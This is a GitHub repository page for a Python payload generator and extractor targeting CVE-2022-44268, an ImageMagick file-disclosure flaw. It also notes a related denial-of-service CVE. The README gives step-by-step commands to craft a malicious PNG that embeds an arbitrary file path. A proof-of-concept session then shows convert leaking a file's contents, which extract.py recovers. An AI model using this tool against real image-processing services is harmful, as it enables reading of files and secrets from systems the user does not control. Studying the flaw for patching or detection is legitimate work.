Skip to content
/ cve-2022-44268 Public

Payload generator and extractor for CVE-2022-44268 written in Python.

4 stars 1 fork Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

agathanon/cve-2022-44268

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
README.md
README.md
 
 
craft.py
craft.py
 
 
extract.py
extract.py
 
 

Repository files navigation

CVE-2022-44268

Credit to the researchers who discovered this:

Create a malicious PNG to take advantage of ImageMagick 7.1.0-40:

  • CVE-2022-44267: Denial of Service
  • CVE-2022-44268: Information Disclosure

Disclaimer: The author of this project is not responsible for any possible harm caused by the materials of this project.

Requirements

  • Python3
  • PIL (pip install Pillow)

Usage

Crafting a PNG with craft.py:

git clone https://github.com/agathanon/cve-2022-44268
cd cve-2022-44268
python3 craft.py original.png lol.png /path/to/file

Data extraction with extract.py:

python3 extract.py exfil.png

PoC

anon@computer:~/code/cve-2022-44268$ python3 craft.py original.png readflag.png $PWD/flag.txt 
anon@computer:~/code/cve-2022-44268$ convert readflag.png -resize 100x100 exfil.png
anon@computer:~/code/cve-2022-44268$ python3 extract.py exfil.png
AAAABBBBCCCC

anon@computer:~/code/cve-2022-44268$

About

Payload generator and extractor for CVE-2022-44268 written in Python.

Resources

Readme
Activity

Stars

4 stars

Watchers

1 watching

Forks

1 fork
Report repository

Languages